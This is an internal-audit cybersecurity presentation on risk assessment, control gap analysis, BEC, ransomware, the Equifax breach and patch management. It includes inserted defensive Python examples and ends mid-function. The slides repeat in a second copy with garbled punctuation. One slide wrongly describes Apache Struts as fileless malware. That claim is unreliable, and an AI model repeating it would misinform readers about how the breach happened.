CYBERSECURITY DEFENSE IN-DEPTH
(Diagram: People – Technology – Processes)
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
35
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
(Cycle: Risk Assessments → Create a Baseline/Gap Analysis → Implement and Manage Controls → Assess & Report)
36
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks in order to identify, estimate and prioritize information security risks
(Flow: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results)
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets.
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
37
38
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
(Example screenshot of a critical data asset risk assessment)
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
39
40
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest priority, most impactful controls that should be implemented first
41
STEP 3 - CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
(Chart: Mitigating Control Counts)
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
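The Step 1 semi-qualitative scoring and the Step 3 procedure (A through D) carried through in code, as an added example that is not part of the presentation. The scoring formula (asset value 1-5 times likelihood 1-10 times impact 1-10), the threat-to-control mapping and the sample register are all assumptions, chosen so that the deck's "risk > 100" cut-off is meaningful.

```python
"""Semi-qualitative risk scoring and mitigating-control counts (Steps 1 and 3).

Added example, not part of the presentation. The scoring formula and the
threat-to-control mapping are assumptions; the assets and ratings are
constructed.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

RISK_THRESHOLD = 100   # the deck's cut-off for a high-risk system/threat pair


@dataclass(frozen=True)
class Asset:
    name: str
    location: str      # where the data lives, from the risk-assessment interviews
    value: int         # 1-5 classification agreed with the business

    def __post_init__(self):
        if not 1 <= self.value <= 5:
            raise ValueError(f"asset value out of range: {self.value}")


@dataclass(frozen=True)
class Threat:
    name: str
    likelihood: int    # 1-10
    impact: int        # 1-10

    def __post_init__(self):
        if not (1 <= self.likelihood <= 10 and 1 <= self.impact <= 10):
            raise ValueError(f"threat rating out of range: {self.name}")


# Assumed mapping of each threat to the controls that reduce it; the control
# names follow the defense-in-depth and quick-hit lists in the deck.
MITIGATING_CONTROLS: Dict[str, List[str]] = {
    "Ransomware": ["Patch Management", "Endpoint Protection",
                   "Tested Backups", "Security Awareness Training"],
    "Business Email Compromise": ["Multi-factor Authentication",
                                  "Security Awareness Training",
                                  "Vendor Bank-Change Verification"],
    "Known-CVE Exploitation": ["Patch Management", "Network Vulnerability Scanning"],
    "Privileged Account Misuse": ["Least Privilege Review",
                                  "Multi-factor Authentication",
                                  "Privilege Change Alerting"],
}


def risk_score(asset: Asset, threat: Threat) -> int:
    """Semi-qualitative score: asset value x likelihood x impact (maximum 500)."""
    return asset.value * threat.likelihood * threat.impact


def high_risk_pairs(assets, threats, threshold=RISK_THRESHOLD) -> List[Tuple[Asset, Threat]]:
    """Steps A and B: (system, specific threat) pairs whose calculated risk exceeds the cut-off."""
    return [(a, t) for a in assets for t in threats if risk_score(a, t) > threshold]


def mitigating_control_counts(pairs) -> Counter:
    """Steps C and D: for each control, total the high-risk pairs it would reduce."""
    counts: Counter = Counter()
    for _, threat in pairs:
        counts.update(MITIGATING_CONTROLS.get(threat.name, []))
    return counts


def prioritized_controls(assets, threats, threshold=RISK_THRESHOLD):
    """Controls ordered by how many high-risk pairs they address: the roadmap order."""
    return mitigating_control_counts(high_risk_pairs(assets, threats, threshold)).most_common()


# Constructed sample register.
ASSETS = [
    Asset("Payroll database", "on-premises", 5),
    Asset("HR file share", "on-premises", 3),
    Asset("Marketing website", "hosted by vendor", 2),
]
THREATS = [
    Threat("Ransomware", likelihood=6, impact=8),
    Threat("Business Email Compromise", likelihood=7, impact=6),
    Threat("Known-CVE Exploitation", likelihood=5, impact=7),
    Threat("Privileged Account Misuse", likelihood=3, impact=9),
]

if __name__ == "__main__":
    for asset, threat in high_risk_pairs(ASSETS, THREATS):
        print(f"{asset.name:20} {threat.name:28} risk={risk_score(asset, threat)}")
    for control, count in prioritized_controls(ASSETS, THREATS):
        print(f"{count:3}  {control}")
```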
42
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
COBIT process capability levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
43
44
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
45
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training awareness program
46
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
• Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
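The vulnerability-management tests above (internet-facing exposure, patches outstanding for over a year, and formal risk acceptance for anything that cannot be patched) run over a device inventory, as an added example that is not part of the presentation. The inventory, its dates and the 30-day patch window are constructed assumptions; the 365-day cut-off reflects the slide's statistic.

```python
"""Patch-management audit test over a device inventory.

Added example, not part of the presentation. The inventory and patch
publication dates are constructed; the 30-day patch window is an assumed
internal SLA, and the 365-day cut-off mirrors the slide's point that
exploited vulnerabilities are typically over a year past their patch.
"""
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Tuple

STALE_AFTER_DAYS = 365   # unpatched for over a year
PATCH_WINDOW_DAYS = 30   # assumed SLA before an unpatched device needs an exception

# Finding codes an auditor would report against a device.
INTERNET_FACING_UNPATCHED = "INTERNET_FACING_UNPATCHED"
STALE_OVER_ONE_YEAR = "STALE_OVER_ONE_YEAR"
NO_RISK_ACCEPTANCE = "NO_RISK_ACCEPTANCE"
VERIFY_MITIGATING_CONTROLS = "VERIFY_MITIGATING_CONTROLS"


@dataclass(frozen=True)
class Device:
    hostname: str
    internet_facing: bool
    software: str
    patch_published: Optional[date]   # vendor release date of the fix; None if no fix exists
    patched_on: Optional[date]        # date the fix was applied; None if still unpatched
    risk_accepted: bool = False       # formal, tracked management acceptance on file


def days_exposed(device: Device, as_of: date) -> int:
    """Days from the vendor fix to the patch date, or to the audit date if unpatched."""
    if device.patch_published is None:
        return 0
    end = device.patched_on or as_of
    return (end - device.patch_published).days


def is_unpatched(device: Device) -> bool:
    return device.patch_published is not None and device.patched_on is None


def audit_findings(devices, as_of: date, stale_after=STALE_AFTER_DAYS,
                   window=PATCH_WINDOW_DAYS) -> List[Tuple[str, str]]:
    """Return (hostname, finding code) pairs for every unpatched device."""
    findings: List[Tuple[str, str]] = []
    for d in devices:
        if not is_unpatched(d):
            continue
        exposed = days_exposed(d, as_of)
        if d.internet_facing:
            findings.append((d.hostname, INTERNET_FACING_UNPATCHED))
        if exposed > stale_after:
            findings.append((d.hostname, STALE_OVER_ONE_YEAR))
        if exposed > window:
            # Past the patch window an exception must be on file, and a documented
            # exception still needs its mitigating controls tested.
            code = VERIFY_MITIGATING_CONTROLS if d.risk_accepted else NO_RISK_ACCEPTANCE
            findings.append((d.hostname, code))
    return findings


def summary(devices, as_of: date) -> dict:
    """Headline counts for the audit report."""
    findings = audit_findings(devices, as_of)
    return {
        "devices": len(devices),
        "unpatched": sum(is_unpatched(d) for d in devices),
        "internet_facing_unpatched": sum(1 for _, c in findings if c == INTERNET_FACING_UNPATCHED),
        "stale_over_one_year": sum(1 for _, c in findings if c == STALE_OVER_ONE_YEAR),
        "no_risk_acceptance": sum(1 for _, c in findings if c == NO_RISK_ACCEPTANCE),
    }


# Constructed inventory; dates are illustrative, not real vendor release dates.
AS_OF = date(2019, 3, 1)
INVENTORY = [
    Device("web01", True, "Java runtime", date(2018, 1, 16), None),
    Device("ws042", False, "Adobe Reader", date(2019, 2, 12), None),
    Device("legacy-hr", False, "End-of-life operating system", date(2017, 6, 1), None,
           risk_accepted=True),
    Device("db01", False, "Windows Server", date(2019, 1, 8), date(2019, 1, 20)),
]

if __name__ == "__main__":
    for host, code in audit_findings(INVENTORY, AS_OF):
        print(f"{host:10} {code}")
    print(summary(INVENTORY, AS_OF))
```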
47
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY:
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco, Principal
mobile: (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates – stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
STEP 4 - CYBERSECURITY REPORTING
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC (Critical Security Controls) framework, which will allow management to begin tracking cybersecurity maturity
COBIT Process Capability Model levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST Special Publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
43
44
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
45
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
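The last bullet above asks how IT is alerted on changes to elevated privileges. The following is an added example of such an alerting check, not code from the presentation or from Stinnett & Associates: it reads a constructed, pipe-delimited export of Windows Security audit events (the event IDs 4728, 4732 and 4756 are the real "member added to a security-enabled global/local/universal group" events; the accounts, SIDs, export format and change-ticket register are all constructed) and raises an alert when the target group is privileged and the addition has no approved change ticket, or when an account adds itself.

```python
"""Alerting on changes to elevated privileges from Windows Security audit events.

Added example; not from the presentation. Group membership is matched by SID
rather than by display name so that a renamed or localized group is still
caught. Event export format, accounts, SIDs and tickets are constructed.
"""
from typing import Dict, List, Tuple

# Well-known privileged groups: domain groups by RID, BUILTIN\Administrators by full SID.
PRIVILEGED_DOMAIN_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
PRIVILEGED_BUILTIN_SIDS = {"S-1-5-32-544": "Administrators"}
# Real Windows Security event IDs for "member added to a security-enabled ... group".
GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}

# Constructed export: timestamp|event_id|subject (who made the change)|member added|group name|group SID
CONSTRUCTED_EVENTS = [
    "2024-03-04T09:12:01Z|4728|CORP\\jsmith|CORP\\svc-backup|Domain Admins|S-1-5-21-1111-2222-3333-512",
    "2024-03-04T09:13:00Z|4624|CORP\\jsmith|-|-|-",  # logon event, not a group change: ignored
    "2024-03-04T09:15:44Z|4732|CORP\\helpdesk1|CORP\\tjones|Remote Desktop Users|S-1-5-32-555",
    "2024-03-04T22:40:10Z|4732|CORP\\tjones|CORP\\tjones|Administrators|S-1-5-32-544",
    "2024-03-05T08:00:00Z|4756|CORP\\adm-rlee|CORP\\adm-kwu|Enterprise Admins|S-1-5-21-1111-2222-3333-519",
]

# Constructed change-management register: (member, group SID) -> approved ticket.
APPROVED_CHANGES: Dict[Tuple[str, str], str] = {
    ("CORP\\adm-kwu", "S-1-5-21-1111-2222-3333-519"): "CHG-1042",
}


def is_privileged_group(sid: str) -> bool:
    """True for BUILTIN\\Administrators and the domain admin-type groups (by RID)."""
    if sid in PRIVILEGED_BUILTIN_SIDS:
        return True
    if not sid.startswith("S-1-5-21-"):
        return False
    rid = int(sid.rsplit("-", 1)[1])
    return rid in PRIVILEGED_DOMAIN_RIDS


def parse_event(line: str) -> Dict[str, str]:
    """Split one line of the constructed export into named fields."""
    ts, event_id, subject, member, group, sid = line.split("|")
    return {"time": ts, "event_id": int(event_id), "subject": subject,
            "member": member, "group": group, "sid": sid}


def review_group_changes(lines: List[str], approved: Dict[Tuple[str, str], str]):
    """Return (alerts, approved_changes) for additions to privileged groups."""
    alerts, ok = [], []
    for line in lines:
        ev = parse_event(line)
        if ev["event_id"] not in GROUP_ADD_EVENTS or not is_privileged_group(ev["sid"]):
            continue
        reasons = []
        ticket = approved.get((ev["member"], ev["sid"]))
        if ticket is None:
            reasons.append("no approved change ticket")
        if ev["subject"] == ev["member"]:
            reasons.append("self-elevation")
        record = {**ev, "scope": GROUP_ADD_EVENTS[ev["event_id"]], "reasons": reasons, "ticket": ticket}
        (alerts if reasons else ok).append(record)
    return alerts, ok


if __name__ == "__main__":
    alerts, approved = review_group_changes(CONSTRUCTED_EVENTS, APPROVED_CHANGES)
    for a in alerts:
        print(f"ALERT {a['time']} {a['subject']} added {a['member']} to {a['group']}: {', '.join(a['reasons'])}")
    for a in approved:
        print(f"ok    {a['time']} {a['member']} -> {a['group']} under {a['ticket']}")
```

An auditor can ask for exactly this reconciliation: every privileged-group addition in the audit log should match an approved change record, and additions with no ticket or where the actor elevated their own account are the exceptions to follow up.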
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
46
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published
  • Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management, and assess whether sufficient mitigating controls are in place
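The bullets above translate into a repeatable audit test over the device inventory. The following is an added example of that test, not code from the presentation or from Stinnett & Associates: every device must be in the scanner's inventory and scanned recently, a device running behind the vendor's latest release is a finding whose severity rises with patch age (over one year is treated as critical, after the statistic above) and with internet exposure, and an unpatched device is only acceptable while a formal, unexpired risk acceptance is on file. The hostnames, dates, patch windows and acceptance register are constructed assumptions.

```python
"""Patch-management audit test over a device inventory.

Added example; not from the presentation. Inventory, dates and the patch
windows are constructed assumptions.
"""
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Device:
    name: str
    kind: str                          # workstation, server, network, appliance ...
    internet_facing: bool
    latest_vendor_patch: date          # release date of the newest applicable vendor patch
    installed_patch: Optional[date]    # release date of the patch actually installed; None = never patched
    last_scanned: Optional[date]       # last vulnerability scan; None = not in the scanner's inventory


@dataclass(frozen=True)
class Finding:
    device: str
    issue: str        # "not scanned" | "unpatched"
    severity: str     # critical | high | medium | accepted
    lag_days: int
    detail: str


# Assumed patch windows: internet-facing devices get 7 days, everything else 30.
PATCH_WINDOW_DAYS = {True: 7, False: 30}
MAX_SCAN_AGE_DAYS = 30
ONE_YEAR = 365


def assess_patch_management(devices: List[Device], acceptances: Dict[str, date], as_of: date) -> List[Finding]:
    """acceptances maps device name -> expiry date of a formally accepted risk."""
    findings: List[Finding] = []
    for d in devices:
        # 1. Is the device known to, and recently covered by, vulnerability scanning?
        if d.last_scanned is None:
            findings.append(Finding(d.name, "not scanned", "high", 0, "device not in scanner inventory"))
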